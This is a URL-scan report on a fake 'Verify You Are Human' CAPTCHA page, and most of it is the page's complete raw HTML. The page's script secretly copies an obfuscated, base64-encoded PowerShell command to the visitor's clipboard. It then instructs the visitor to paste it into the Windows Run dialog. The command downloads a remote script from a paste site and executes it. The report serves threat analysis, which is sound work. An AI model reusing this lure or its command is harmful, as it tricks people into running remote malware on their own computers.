- 扫描 ID:
- 45501edc-6f9a-41e8-801c-b666bc5648d8已完成
- 提交的 URL:
- https://spark-captcha.netlify.app/
- 报告完成时间:
链接 · 找到 0 个
从页面中识别出的传出链接
JavaScript 变量 · 找到 4 个
在页面窗口对象上加载的全局 JavaScript 变量是在函数外部声明的变量,可以从当前范围内的代码中的任何位置访问
名称 | 类型 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
verify | function |
控制台日志消息 · 找到 1 条
记录到 Web 控制台的消息
类型 | 类别 | 记录 |
---|---|---|
error | network |
|
HTML
页面的原始 HTML 正文
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Verify You Are Human</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
<style>
body, html {
margin: 0;
padding: 0;
width: 100%;
height: 100%;
display: flex;
justify-content: center;
align-items: center;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: #f2f2f2;
color: #333;
}
.container {
text-align: center;
max-width: 500px;
margin: 20px;
position: relative;
}
.recaptcha-box {
padding: 20px;
background: #fff;
box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);
border-radius: 8px;
text-align: center;
}
.recaptcha-box h2 {
margin: 0 0 20px;
font-size: 28px;
color: #4285f4;
}
.recaptcha-box p {
margin: 0 0 20px;
font-size: 18px;
color: #666;
}
.recaptcha-button {
display: inline-flex;
align-items: center;
padding: 10px 20px;
background: #4285f4;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
font-size: 16px;
transition: background 0.3s;
}
.recaptcha-button img {
margin-right: 10px;
}
.recaptcha-button:hover {
background: #357ae8;
}
.recaptcha-popup {
display: none;
padding: 20px;
background: #fff;
box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);
border-radius: 8px;
text-align: left;
position: absolute;
top: 110%;
left: 50%;
transform: translateX(-50%);
z-index: 20;
animation: fadeIn 0.5s ease;
}
.recaptcha-popup.active {
display: block;
}
.recaptcha-popup h3 {
margin: 0 0 15px;
font-size: 24px;
color: #333;
}
.recaptcha-popup p {
font-size: 18px;
color: #333;
margin: 5px 0;
}
.overlay {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0, 0, 0, 0.5);
z-index: 10;
display: none;
}
.overlay.active {
display: block;
}
@keyframes fadeIn {
from { opacity: 0; }
to { opacity: 1; }
}
</style>
</head>
<body>
<div class="container">
<div class="overlay" id="overlay"></div>
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="recaptcha-button" id="verifyButton">
<img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="reCAPTCHA Logo">
<span>I'm not a robot</span>
</div>
<div class="recaptcha-popup" id="recaptchaPopup">
<h3>Verification Steps</h3>
<p>1. Press Windows Button "<i class="fab fa-windows"></i>" + R</p>
<p>2. Press CTRL + V</p>
<p>3. Press Enter</p>
</div>
</div>
</div>
<script>
function verify() {
const textToCopy = "powershell.exe -eC KGl3ciAtVXJpICJodHRwczovL3Bhc3RlLmVlL2QvdlF2Q20iIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQgfCBPdXQtRmlsZSAtRmlsZVBhdGggIiRlbnY6VEVNUFxzcGFyay5wczEiOyBpZXggKEdldC1Db250ZW50IC1QYXRoICIkZW52OlRFTVBcc3BhcmsucHMxIiAtUmF3KQ==";
const tempTextArea = document.createElement("textarea");
tempTextArea.value = textToCopy;
document.body.appendChild(tempTextArea);
tempTextArea.select();
document.execCommand("copy");
document.body.removeChild(tempTextArea);
const recaptchaPopup = document.getElementById("recaptchaPopup");
const overlay = document.getElementById("overlay");
recaptchaPopup.classList.add("active");
overlay.classList.add("active");
}
const verifyButton = document.getElementById('verifyButton');
verifyButton.addEventListener('click', verify);
</script>
</body></html>